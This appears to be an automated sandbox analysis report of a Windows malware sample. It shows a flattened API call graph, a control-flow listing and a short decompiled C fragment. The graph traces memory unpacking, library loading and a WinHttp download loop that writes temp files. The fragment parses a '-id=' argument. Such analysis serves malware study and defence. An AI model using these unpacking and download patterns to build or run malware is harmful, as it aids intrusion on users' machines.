12ce69 305 API calls 26998 11da90 49 API calls std::generic_category 26858 128490 ExtSelectClipRgn ExtSelectClipRgn 26859 126c90 121 API calls 26860 118495 GetModuleHandleA 26999 128a97 49 API calls 27000 11be97 51 API calls 27002 11ce98 28 API calls 3 library calls 27003 128699 SetPolyFillMode SetPolyFillMode 26861 13b083 51 API calls 27004 12d282 71 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26259 119485 26260 1194b2 26259->26260 26261 119492 26259->26261 26273 118b30 24 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26260->26273 26262 1194ab 26261->26262 26266 11942e 26261->26266 26267 11943f 26266->26267 26268 119448 26267->26268 26271 119452 26267->26271 26274 1193a0 26268->26274 26270 119450 26270->26262 26271->26270 26289 1194bd 24 API calls 26271->26289 26275 1193ca 26274->26275 26290 11acdc 26275->26290 26277 119428 26294 119527 26277->26294 26278 1193ee 26297 119322 24 API calls _memcpy_s 26278->26297 26281 11942d 26283 119448 26281->26283 26286 119452 26281->26286 26282 119409 26282->26270 26284 1193a0 34 API calls 26283->26284 26285 119450 26284->26285 26285->26270 26286->26285 26287 1194bd 24 API calls 26286->26287 26287->26285 26289->26270 26291 1193e5 26290->26291 26292 11acee 26290->26292 26291->26277 26291->26278 26298 24f853 26292->26298 26307 118b30 24 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26294->26307 26297->26282 26304 25afac _memcpy_s 26298->26304 26299 25afea 26306 24f9ad 14 API calls _memcpy_s 26299->26306 26301 25afd5 RtlAllocateHeap 26302 25afe8 26301->26302 26301->26304 26302->26291 26304->26299 26304->26301 26305 261349 RtlEnterCriticalSection RtlLeaveCriticalSection _memcpy_s 26304->26305 26305->26304 26306->26302 26862 11b884 34 API calls 27005 119289 17 API calls 26863 11848b GetModuleHandleW 26864 12288e 51 API calls 26865 12108d ScreenToClient 26866 1288b1 TextOutW 26867 1208b6 57 API calls 3 library calls 26868 256c80 24 API calls 3 library calls 27008 1246b4 LoadLibraryW 27010 1372bf 50 API calls 27011 1246be LoadLibraryA 27012 1276be 49 API calls 26869 12ccbf 55 API calls 27013 1306be 423 API calls DloadLock 26871 1254a7 70 API calls DloadLock 26873 d20ba 60 API calls 27018 126eaa 114 API calls 27019 11f6aa 94 API calls __EH_prolog3_GS 27020 12aeae 149 API calls 26875 2644e7 19 API calls 27021 128ad3 54 API calls 27022 12fed0 146 API calls 26876 1210d6 13 API calls 27024 1886d0 57 API calls 26877 1380d8 60 API calls 26878 12c8df 50 API calls 26880 11fcdf 54 API calls 27026 1282dd RectVisible 26882 d10dd 12 API calls 26883 13b0c2 323 API calls DloadLock 26884 134cc0 52 API calls 27027 1282c7 PtVisible 27028 1286ca SetROP2 SetROP2 26885 1284f2 SelectObject SelectObject 27029 1256f6 73 API calls 27030 265ac0 15 API calls 26887 1300fb SetRectEmpty SetRectEmpty 27031 1282fa RestoreDC RestoreDC 27032 1362fb 155 API calls 27033 1286fb SetTextAlign SetTextAlign 26889 1204fd 50 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26890 1280e2 GetClipBox 26891 11b4e7 53 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26892 11d4e7 75 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 27038 11faee 73 API calls 26894 118d12 48 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26895 12fd17 InflateRect 27039 122717 SetMenu 26896 12e11a 102 API calls DloadLock 27041 11ff1d GetWindowPlacement 26898 11f901 PostMessageW 27043 11e703 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess DloadLock 27044 125f00 GetModuleHandleW GetProcAddress RtlEncodePointer RtlDecodePointer 26900 13910b 68 API calls 26901 11dd09 LocalFree FreeLibrary 26902 136108 314 API calls DloadLock 27045 128733 SetTextColor SetTextColor 27046 125b31 72 API calls 27048 137f37 147 API calls DloadLock 27049 125737 73 API calls 27052 134f3f 49 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 27053 12cf3f 55 API calls 27054 134b3c 55 API calls 26217 1300000 26219 1300005 26217->26219 26220 1300017 26219->26220 26222 13004fd 26220->26222 26223 1300542 26222->26223 26224 1300570 GetPEB 26223->26224 26226 1300568 26223->26226 26224->26226 26225 13005f5 VirtualAlloc 26228 130063b 26225->26228 26226->26225 26227 13005bd VirtualAlloc 26226->26227 26227->26225 26229 1300654 VirtualAlloc 26228->26229 26244 130023e 26229->26244 26232 13006bd 26233 130079d VirtualProtect 26232->26233 26234 13007bc 26233->26234 26235 13007ef 26233->26235 26234->26235 26236 13007ca VirtualProtect 26234->26236 26246 13003a6 26235->26246 26236->26234 26238 130084d 26239 1300878 VirtualProtect 26238->26239 26240 13008b3 VirtualProtect 26239->26240 26242 1300910 VirtualFree GetPEB 26240->26242 26243 1300944 26242->26243 26243->26220 26245 130024d VirtualFree 26244->26245 26245->26232 26247 130040c 26246->26247 26249 13003b3 26246->26249 26247->26238 26248 13003da LoadLibraryExA 26248->26249 26249->26247 26249->26248 27055 120722 86 API calls 27056 137b21 81 API calls 2 library calls 27058 12af27 149 API calls 26904 11c92b 71 API calls DloadLock 26905 120529 55 API calls 27061 13732f 51 API calls 26907 11fd53 6 API calls DloadLock 26908 12c955 76 API calls 27062 135754 40 API calls 26909 132559 55 API calls 27064 126f5f 113 API calls 26910 13615d 186 API calls 26911 12c141 154 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26912 135d40 334 API calls 2 library calls 26913 257171 14 API calls 26914 130544 50 API calls 26915 13a94a 27 API calls 27066 12774e 50 API calls 27067 12f34f 96 API calls 26917 12814d GrayStringW 26918 122572 12 API calls DloadLock 26920 12d175 10 API calls 27068 135b7b 57 API calls 26922 12617e 43 API calls 26466 12ff7f 26467 12ff8e 26466->26467 26468 12ff95 26466->26468 26470 14700b 26467->26470 26471 14702c _memcpy_s 26470->26471 26472 1470b3 26470->26472 26475 14705c VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 26471->26475 26473 248edc DloadLock 4 API calls 26472->26473 26474 1470c6 26473->26474 26474->26468 26481 147998 26475->26481 26477 1470a5 26551 14745f 26477->26551 26479 1470ac 26635 1470f2 8 API calls 26479->26635 26636 24972f 26481->26636 26483 1479a4 GetSysColor 26484 1479c5 GetSysColor 26483->26484 26485 1479b9 GetSysColor 26483->26485 26487 1479dc GetSysColor 26484->26487 26488 1479e8 26484->26488 26485->26484 26487->26488 26637 12738b 26488->26637 26490 1479fe 21 API calls 26492 147b33 GetSysColor 26490->26492 26493 147b28 26490->26493 26494 147b49 GetSysColorBrush 26492->26494 26493->26494 26495 147b60 GetSysColorBrush 26494->26495 26498 147b5b 26494->26498 26497 147b6f GetSysColorBrush 26495->26497 26495->26498 26497->26498 26538 147cdf CreateSolidBrush 26498->26538 26539 127f62 49 API calls 26498->26539 26542 147d5f 26498->26542 26643 127f62 26498->26643 26659 118704 48 API calls 2 library calls 26498->26659 26660 146a63 5 API calls 2 library calls 26498->26660 26500 147b8b CreateSolidBrush 26648 127dff 26500->26648 26503 127f62 49 API calls 26504 147ba9 CreateSolidBrush 26503->26504 26505 127dff 48 API calls 26504->26505 26506 147bba 26505->26506 26507 127f62 49 API calls 26506->26507 26508 147bc7 CreateSolidBrush 26507->26508 26509 127dff 48 API calls 26508->26509 26510 147bd8 26509->26510 26511 127f62 49 API calls 26510->26511 26512 147be5 CreateSolidBrush 26511->26512 26513 127dff 48 API calls 26512->26513 26514 147bf9 26513->26514 26515 127f62 49 API calls 26514->26515 26516 147c06 CreateSolidBrush 26515->26516 26517 127dff 48 API calls 26516->26517 26518 147c17 26517->26518 26519 127f62 49 API calls 26518->26519 26520 147c24 CreateSolidBrush 26519->26520 26521 127dff 48 API calls 26520->26521 26522 147c35 26521->26522 26523 127f62 49 API calls 26522->26523 26524 147c42 CreateSolidBrush 26523->26524 26525 127dff 48 API calls 26524->26525 26526 147c53 26525->26526 26527 127f62 49 API calls 26526->26527 26528 147c60 CreatePen 26527->26528 26529 127dff 48 API calls 26528->26529 26530 147c77 26529->26530 26531 127f62 49 API calls 26530->26531 26532 147c84 CreatePen 26531->26532 26533 127dff 48 API calls 26532->26533 26534 147c9b 26533->26534 26535 127f62 49 API calls 26534->26535 26536 147ca8 CreatePen 26535->26536 26537 127dff 48 API calls 26536->26537 26537->26498 26540 127dff 48 API calls 26538->26540 26539->26498 26544 147d4b 26540->26544 26543 127dff 48 API calls 26542->26543 26545 147d78 CreatePatternBrush 26543->26545 26654 127601 26544->26654 26547 127dff 48 API calls 26545->26547 26549 147d89 26547->26549 26548 147daf Concurrency::details::ExternalContextBase::~ExternalContextBase 26548->26477 26661 12748f 26549->26661 26552 14746e __EH_prolog3_GS 26551->26552 26553 12738b 48 API calls 26552->26553 26555 14747d 26553->26555 26554 1474f9 26556 147517 26554->26556 26561 127fb4 48 API calls 26554->26561 26555->26554 26557 127fb4 48 API calls 26555->26557 26558 147535 26556->26558 26562 127fb4 48 API calls 26556->26562 26560 1474f2 DeleteObject 26557->26560 26559 147553 26558->26559 26566 127fb4 48 API calls 26558->26566 26563 147571 26559->26563 26570 127fb4 48 API calls 26559->26570 26560->26554 26564 147510 DeleteObject 26561->26564 26565 14752e DeleteObject 26562->26565 26567 14758f 26563->26567 26573 127fb4 48 API calls 26563->26573 26564->26556 26565->26558 26569 14754c DeleteObject 26566->26569 26568 1475ad 26567->26568 26575 127fb4 48 API calls 26567->26575 26571 1475cb 26568->26571 26579 127fb4 48 API calls 26568->26579 26569->26559 26572 14756a DeleteObject 26570->26572 26576 1475e9 26571->26576 26582 127fb4 48 API calls 26571->26582 26572->26563 26574 147588 DeleteObject 26573->26574 26574->26567 26578 1475a6 DeleteObject 26575->26578 26577 147607 26576->26577 26583 127fb4 48 API calls 26576->26583 26692 146f60 26577->26692 26578->26568 26581 1475c4 DeleteObject 26579->26581 26581->26571 26585 1475e2 DeleteObject 26582->26585 26586 147600 DeleteObject 26583->26586 26584 14761f _memcpy_s 26587 14762c GetTextCharsetInfo 26584->26587 26585->26576 26586->26577 26588 147664 lstrcpyW 26587->26588 26590 147695 26588->26590 26591 147701 CreateFontIndirectW 26588->26591 26590->26591 26592 14769e EnumFontFamiliesW 26590->26592 26593 127dff 48 API calls 26591->26593 26594 1476cf EnumFontFamiliesW 26592->26594 26595 1476ba lstrcpyW 26592->26595 26598 147713 26593->26598 26596 1476ee lstrcpyW 26594->26596 26595->26591 26596->26591 26599 147752 CreateFontIndirectW 26598->26599 26600 127dff 48 API calls 26599->26600 26601 147764 26600->26601 26602 146f60 SystemParametersInfoW 26601->26602 26603 14777f CreateFontIndirectW 26602->26603 26604 127dff 48 API calls 26603->26604 26605 1477a7 CreateFontIndirectW 26604->26605 26606 127dff 48 API calls 26605->26606 26607 1477d3 CreateFontIndirectW 26606->26607 26608 127dff 48 API calls 26607->26608 26609 1477f4 GetSystemMetrics lstrcpyW CreateFontIndirectW 26608->26609 26610 127dff 48 API calls 26609->26610 26611 147830 GetStockObject 26610->26611 26612 1478d3 GetStockObject 26611->26612 26613 14785a GetObjectW 26611->26613 26614 1280d0 26612->26614 26613->26612 26615 14786b lstrcpyW CreateFontIndirectW 26613->26615 26616 1478e1 GetObjectW CreateFontIndirectW 26614->26616 26617 127dff 48 API calls 26615->26617 26618 127dff 48 API calls 26616->26618 26619 1478ba CreateFontIndirectW 26617->26619 26621 14790a CreateFontIndirectW 26618->26621 26620 127dff 48 API calls 26619->26620 26620->26612 26622 127dff 48 API calls 26621->26622 26623 14792b 26622->26623 26695 147db5 26623->26695 26625 14796c 26626 12748f 53 API calls 26625->26626 26629 147981 26626->26629 26627 147932 26627->26625 26628 147992 26627->26628 26709 11fa06 48 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26627->26709 26710 118704 48 API calls 2 library calls 26628->26710 26631 127601 49 API calls 26629->26631 26634 14798c 26631->26634 26633 147997 26634->26479 26635->26472 26636->26483 26638 127397 __EH_prolog3 26637->26638 26666 127dbe 26638->26666 26640 1273cc 26641 1273d5 Concurrency::details::ExternalContextBase::~ExternalContextBase 26640->26641 26672 127d8a RaiseException __CxxThrowException@8 26640->26672 26641->26490 26644 127f6b 26643->26644 26645 127f68 26643->26645 26675 127fb4 26644->26675 26645->26500 26647 127f70 DeleteObject 26647->26500 26649 127e0c 26648->26649 26653 127e21 26648->26653 26680 12893e 48 API calls 2 library calls 26649->26680 26651 127e16 26681 11b06a 48 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26651->26681 26653->26503 26682 127f78 26654->26682 26656 127631 26686 127446 26656->26686 26659->26495 26660->26498 26662 127f62 49 API calls 26661->26662 26663 1274cf 26662->26663 26664 248edc DloadLock 4 API calls 26663->26664 26665 1274e7 26664->26665 26665->26544 26667 127dcb 26666->26667 26671 127de1 26666->26671 26673 1288cd 48 API calls 2 library calls 26667->26673 26669 127dd6 26674 11b06a 48 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26669->26674 26671->26640 26673->26669 26674->26671 26676 127fc6 26675->26676 26677 127fbf 26675->26677 26676->26647 26679 12893e 48 API calls 2 library calls 26677->26679 26679->26676 26680->26651 26681->26653 26683 127f84 26682->26683 26685 127f8b 26682->26685 26691 1288cd 48 API calls 2 library calls 26683->26691 26685->26656 26687 127480 26686->26687 26688 127474 26686->26688 26687->26548 26689 127f78 48 API calls 26688->26689 26690 127479 DeleteDC 26689->26690 26690->26687 26691->26685 26693 146f75 SystemParametersInfoW 26692->26693 26694 146f6f 26692->26694 26693->26584 26694->26693 26696 147dc1 __EH_prolog3_GS 26695->26696 26697 12738b 48 API calls 26696->26697 26698 147dcd 26697->26698 26711 128538 26698->26711 26700 147de0 26701 147deb GetTextMetricsW 26700->26701 26717 118704 48 API calls 2 library calls 26700->26717 26703 128538 2 API calls 26701->26703 26704 147e2c GetTextMetricsW 26703->26704 26705 128538 2 API calls 26704->26705 26706 147e67 26705->26706 26707 127601 49 API calls 26706->26707 26708 147e6f 26707->26708 26708->26627 26709->26627 26710->26633 26712 12854f SelectObject 26711->26712 26714 12855e 26711->26714 26712->26714 26715 128574 26714->26715 26716 12856a SelectObject 26714->26716 26715->26700 26716->26715 26717->26701 27070 11937f LocalAlloc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 26923 12817d IntersectClipRect IntersectClipRect 26924 122962 49 API calls 26925 11b562 ValidateRect 26926 130567 81 API calls 27074 125b64 72 API calls 27075 13b364 64 API calls 27076 128765 SetViewportExtEx SetViewportExtEx 27077 12836c ScaleViewportExtEx ScaleViewportExtEx 26927 13b193 62 API calls 27078 131f93 143 API calls _memcpy_s 27079 134395 165 API calls 26929 130599 61 API calls DloadLock 26930 134d98 81 API calls 27082 12bf9f 80 API calls 2 library calls 27083 131386 75 API calls 5 library calls 27084 11cb89 70 API calls _strlen 26932 11bd88 53 API calls DloadLock 27085 12278b SetScrollInfo 27086 125789 72 API calls 27088 11ff8d 14 API calls DloadLock 27090 12bbb1 49 API calls 26934 1251b5 RegSetValueExW 27094 25738c 40 API calls 26935 1291b9 36 API calls 26936 1265b9 15 API calls 26937 12c5be 307 API calls DloadLock 26938 1259be 72 API calls 27096 1283bd ScaleWindowExtEx ScaleWindowExtEx 27097 1307a3 IsWindowEnabled 27099 134fa3 SelectObject 27100 134ba7 57 API calls DloadLock 26939 12bda4 49 API calls 26940 1285a5 GetStockObject SelectObject SelectObject 26354 116fa9 GetEnvironmentVariableW 26355 117022 26354->26355 26372 1177dd 26355->26372 26357 117034 26358 117079 GetSystemInfo 26357->26358 26359 1170a4 26358->26359 26379 112ae7 26359->26379 26361 117137 26382 117a34 26361->26382 26363 117199 FindFirstChangeNotificationW 26365 11721d 26363->26365 26392 1179a8 26 API calls 26365->26392 26367 1172b1 26368 117401 GetEnvironmentVariableW 26367->26368 26369 117458 26368->26369 26393 115bb4 26369->26393 26371 117635 26373 1177ed 26372->26373 26374 1177f1 26373->26374 26375 11780d 26373->26375 26403 1178d9 26 API calls _memmove_s 26374->26403 26404 11787c 26 API calls 26375->26404 26378 11780b 26378->26357 26405 117c36 26379->26405 26383 117a48 26382->26383 26384 117aaf 26382->26384 26386 117ab9 26383->26386 26387 117a5f 26383->26387 26419 24a498 26 API calls 2 library calls 26384->26419 26420 24a478 26 API calls 2 library calls 26386->26420 26391 117a73 26387->26391 26418 11787c 26 API calls 26387->26418 26391->26363 26392->26367 26394 115c17 __vsnwscanf_s_l 26393->26394 26395 11628c GetEnvironmentVariableW 26394->26395 26401 1162bb 26395->26401 26396 1168e5 26421 112f27 26396->26421 26398 11697c GetModuleFileNameW 26400 116a01 26398->26400 26400->26371 26401->26396 26402 1167b2 Sleep 26401->26402 26402->26401 26403->26378 26404->26378 26406 117c5e 26405->26406 26407 117cbb 26406->26407 26408 1177dd 26 API calls 26406->26408 26411 248edc 26407->26411 26408->26407 26410 112afb 26410->26361 26412 248ee5 26411->26412 26413 248ee7 26411->26413 26412->26410 26414 249906 26413->26414 26417 2498ca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26414->26417 26416 2499e9 26416->26410 26417->26416 26418->26391 26419->26386 26422 112f79 GetModuleFileNameW 26421->26422 26424 113006 VirtualProtect 26422->26424 26426 113098 26424->26426 26426->26398 26941 1231aa 56 API calls 27101 1287aa SetViewportOrgEx SetViewportOrgEx 26943 12b1d2 146 API calls 27103 119bd2 54 API calls std::generic_category 27104 134fd0 292 API calls 27105 1247d7 CheckDlgButton 27106 1387d6 82 API calls 27107 12ebda CombineRgn 26944 11d1d8 54 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 27108 117fdb 18 API calls 2 library calls 27109 127fde DrawTextExW 26945 1369de 53 API calls 27110 1227df SetScrollPos 26946 14fdda 149 API calls 26947 1281c3 MoveToEx LineTo 26308 118bc6 26309 118bd2 __EH_prolog3_catch 26308->26309 26310 118c01 Concurrency::details::ExternalContextBase::~ExternalContextBase 26309->26310 26314 11a845 26309->26314 26313 118be0 26325 11a8b9 49 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26313->26325 26315 11a8b3 26314->26315 26316 11a852 26314->26316 26327 118704 48 API calls 2 library calls 26315->26327 26318 11a860 26316->26318 26326 11a821 RtlInitializeCriticalSection 26316->26326 26321 11a8a1 RtlEnterCriticalSection 26318->26321 26322 11a86f RtlEnterCriticalSection 26318->26322 26319 11a8b8 26321->26313 26323 11a886 RtlInitializeCriticalSection 26322->26323 26324 11a899 RtlLeaveCriticalSection 26322->26324 26323->26324 26324->26321 26325->26310 26326->26318 26327->26319 27112 1187c6 62 API calls 26948 13adca 342 API calls DloadLock 26949 1211c9 56 API calls 2 library calls 26718 d13d3 26721 d12f9 26718->26721 26737 d121e GetCommandLineA StrStrIA 26721->26737 26724 d1335 26746 d2395 GetTickCount 26724->26746 26725 d1311 26726 d1328 26725->26726 26731 d13cc ExitProcess 26725->26731 26756 d1000 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress GetModuleFileNameA 26726->26756 26729 d1330 26729->26731 26732 d1380 memset 26732->26731 26733 d139b WaitForSingleObject 26732->26733 26757 d11e0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress GetModuleFileNameA 26733->26757 26735 d13b7 26735->26731 26736 d13bc GetProcessHeap HeapFree 26735->26736 26736->26731 26738 d12ee 26737->26738 26739 d1244 StrToIntA GetTempPathA wsprintfA 26737->26739 26738->26724 26738->26725 26758 d143a 8 API calls 26739->26758 26741 d128d 26741->26738 26759 d24cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 26741->26759 26743 d12bd 26744 d12c5 GetProcessHeap HeapFree 26743->26744 26745 d12d7 26743->26745 26744->26745 26745->26738 26752 d23d1 26746->26752 26747 d137a 26747->26731 26747->26732 26749 d2498 Sleep 26749->26752 26751 d2481 GetProcessHeap HeapFree 26751->26752 26752->26747 26752->26749 26752->26751 26753 d2426 GetTempPathA wsprintfA 26752->26753 26760 d22b0 26752->26760 26771 d24cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 26752->26771 26772 d13e1 CreateFileA WriteFile CloseHandle 26753->26772 26755 d246e 26755->26752 26756->26729 26757->26735 26758->26741 26759->26743 26773 d216d wsprintfW 26760->26773 26762 d237c 26762->26752 26766 d2326 26766->26762 26768 d216d 24 API calls 26766->26768 26767 d2316 GetProcessHeap RtlFreeHeap 26767->26766 26769 d2352 26768->26769 26769->26762 26770 d236a GetProcessHeap RtlFreeHeap 26769->26770 26770->26762 26771->26752 26772->26755 26774 d21bf 26773->26774 26787 d14ec WinHttpOpen 26774->26787 26777 d21ee 26777->26762 26779 d2218 lstrlenA 26777->26779 26778 d21fb GetProcessHeap RtlFreeHeap 26778->26777 26780 d2234 StrStrIA 26779->26780 26781 d22a8 26780->26781 26784 d2242 26780->26784 26781->26766 26781->26767 26782 d225b StrStrIA 26782->26781 26783 d226c StrChrA 26782->26783 26783->26784 26785 d2284 wsprintfW 26783->26785 26784->26780 26784->26782 26785->26781 26788 d1719 26787->26788 26789 d152b 26787->26789 26788->26777 26788->26778 26790 d1543 WinHttpConnect 26789->26790 26791 d1535 WinHttpSetStatusCallback 26789->26791 26792 d1561 WinHttpOpenRequest 26790->26792 26793 d1712 WinHttpCloseHandle 26790->26793 26791->26790 26795 d159b 26792->26795 26796 d1704 WinHttpCloseHandle 26792->26796 26793->26788 26797 d15b8 WinHttpSendRequest 26795->26797 26798 d15a0 WinHttpSetOption 26795->26798 26796->26793 26799 d16fd WinHttpCloseHandle 26797->26799 26800 d15dd WinHttpReceiveResponse 26797->26800 26798->26797 26799->26796 26800->26799 26801 d15ef WinHttpQueryHeaders WinHttpQueryHeaders GetProcessHeap 26800->26801 26802 d1657 26801->26802 26803 d1678 GetProcessHeap HeapAlloc 26802->26803 26804 d166a GetProcessHeap RtlReAllocateHeap 26802->26804 26805 d16c1 26802->26805 26808 d1689 WinHttpReadData 26802->26808 26809 d16a8 WinHttpQueryDataAvailable 26802->26809 26803->26802 26804->26802 26806 d16d6 GetProcessHeap HeapFree 26805->26806 26807 d16e2 26805->26807 26806->26807 26807->26799 26808->26802 26808->26805 26809->26802 26950 1189cf LocalFree 27113 1353f3 309 API calls 26951 13b1f1 66 API calls DloadLock 27114 17e7f4 11 API calls DloadLock 26952 1341f5 157 API calls 26954 1281f8 MoveToEx MoveToEx 26955 11adfa 16 API calls 27116 12cfff 49 API calls 26956 12b1fd 157 API calls 27117 127ffd DrawTextW 27118 11efe1 AdjustWindowRectEx 27120 1373e0 50 API calls 26959 12b1e6 145 API calls 27124 1207e4 SendMessageW 26960 1285e5 SetBkColor SetBkColor 26961 2595dc 69 API calls 2 library calls 27126 1257e8 78 API calls DloadLock 27128 11fbed lstrcmpW 26962 1251ef 24 API calls 27129 1287ef SetWindowExtEx SetWindowExtEx

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 281 116fa9-117020 GetEnvironmentVariableW 282 117022-117028 call 24f36e 281->282 283 117029-117046 call 1177dd 281->283 282->283 288 117048-11705f 283->288 289 117061-11706a 288->289 290 11706c-1170ae call 116dc0 GetSystemInfo call 116ecb 288->290 289->288 289->290 295 1170b0-1170b6 290->295 296 1170dc 290->296 297 1170c0-1170da 295->297 298 1170b8-1170be 295->298 299 1170e1-11710f call 116dc0 296->299 297->299 298->296 298->297 302 117111-117125 299->302 303 11712b-11715c call 112ae7 call 116ecb 299->303 302->303 308 117188-1171bd call 117a34 303->308 309 11715e-117164 303->309 314 1171d3-11721b FindFirstChangeNotificationW 308->314 315 1171bf-1171cd 308->315 310 117166-11716c 309->310 311 11716e-117183 309->311 310->308 310->311 311->308 316 117237-117247 314->316 317 11721d-117220 314->317 315->314 319 11724b-117263 316->319 317->316 318 117222-117225 317->318 320 117230-117233 318->320 321 117227-11722e 318->321 322 117270-117295 319->322 323 117265-11726e 319->323 320->316 321->316 324 117297-117299 322->324 325 11729b-1172a5 call 24f36e 322->325 323->319 323->322 326 1172a6-1172b7 call 1179a8 324->326 325->326 331 1172d7 326->331 332 1172b9-1172d5 326->332 333 1172dd-1172f5 331->333 332->333 334 117315-117339 call 116ecb 333->334 335 1172f7 333->335 340 117360-11737f 334->340 341 11733b-11735e 334->341 336 1172f9-1172fb 335->336 337 1172fd-117310 335->337 336->334 336->337 337->334 342 117382-1173b5 call 116d3c 340->342 341->342 345 1173b7-1173da 342->345 346 1173dc-1173fc 342->346 347 117401-117454 GetEnvironmentVariableW 345->347 346->347 348 117458-117466 347->348 349 117473-11747d 348->349 350 117468-117471 348->350 351 117497-1174bd 349->351 352 11747f-117482 349->352 350->348 350->349 354 1174e0-1174f9 351->354 355 1174bf-1174dc 351->355 352->351 353 117484-117487 352->353 356 117490-117495 353->356 357 117489-11748e 353->357 358 117521-11753c 354->358 359 1174fb-11751f 354->359 355->354 356->351 357->351 360 117541-11754a 358->360 359->360 361 11757a-1175b1 call 116d3c 360->361 362 11754c-117574 360->362 365 1175b3-1175d6 361->365 366 1175dc-117606 call 116ecb 361->366 362->361 365->366 369 117608 366->369 370 11762d-117630 call 115bb4 366->370 371 117612-117628 369->371 372 11760a-117610 369->372 374 117635-117650 call 116c92 370->374 371->370 372->370 372->371 377 117652-117676 374->377 378 11767c-1176a6 374->378 377->378
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(LoveIn,0028EA38,0000076D), ref: 00116FEA
                                                                                                                                                                                                                                                                • GetSystemInfo.KERNELBASE(002A3D54,0028EA38,00000000), ref: 00117080
                                                                                                                                                                                                                                                                • FindFirstChangeNotificationW.KERNELBASE(?,00000001,00000100,?,00000000,000000FF), ref: 001171F7
                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(equalSu,C:\Users\user\Desktop\sample4.exe,0000076D,C:\Users\user\Desktop\sample4.exe,00000000), ref: 00117425
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentVariable$ChangeFindFirstInfoNotificationSystem
                                                                                                                                                                                                                                                                • String ID: 8($C:\Users\user\Desktop\sample4.exe$LoveIn$equalSu$ -
                                                                                                                                                                                                                                                                • API String ID: 2077342498-624044919
                                                                                                                                                                                                                                                                • Opcode ID: f438a0f184ee00006af4404f74f52b8b18740be9ab763c4e03befd7cc97048d3
                                                                                                                                                                                                                                                                • Instruction ID: 7399eafdf43650a4122f99fbf48aef97994ab66dd287d1f6e9a6ca12053ab666
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f438a0f184ee00006af4404f74f52b8b18740be9ab763c4e03befd7cc97048d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF02E67950F2918BD71DEB35B8AD0F57FF0EA66B11B08046EF8D1873E2D2288689D711
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 400 d121e-d123e GetCommandLineA StrStrIA 401 d12ee 400->401 402 d1244-d1292 StrToIntA GetTempPathA wsprintfA call d143a 400->402 403 d12f0-d12f8 401->403 402->401 406 d1294-d12c3 call d24cf 402->406 409 d12c5-d12d1 GetProcessHeap HeapFree 406->409 410 d12d7-d12de 406->410 409->410 410->401 411 d12e0-d12ec 410->411 411->403
                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                			E000D121E(char* __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                                                				void* _v256;
                                                                                                                                                                                                                                                                				long _v260;
                                                                                                                                                                                                                                                                				char _v264;
                                                                                                                                                                                                                                                                				long _v268;
                                                                                                                                                                                                                                                                				intOrPtr _v272;
                                                                                                                                                                                                                                                                				intOrPtr _v276;
                                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                                				void* _v284;
                                                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                                                				char* _t32;
                                                                                                                                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t41 = __edx;
                                                                                                                                                                                                                                                                				_t32 = __ecx;
                                                                                                                                                                                                                                                                				_t17 = StrStrIA(GetCommandLineA(), "-id="); // executed
                                                                                                                                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				 *0xd3000 = StrToIntA( &(_t17[4]));
                                                                                                                                                                                                                                                                				wsprintfA( &(( &_v264)[GetTempPathA(0x104,  &_v264)]), "~%u.tmp",  *0xd3000);
                                                                                                                                                                                                                                                                				if(E000D143A( &_v284,  &_v280) == 0) {
                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_v272 = 4;
                                                                                                                                                                                                                                                                				_v268 = 0;
                                                                                                                                                                                                                                                                				_v276 = 0xd3000;
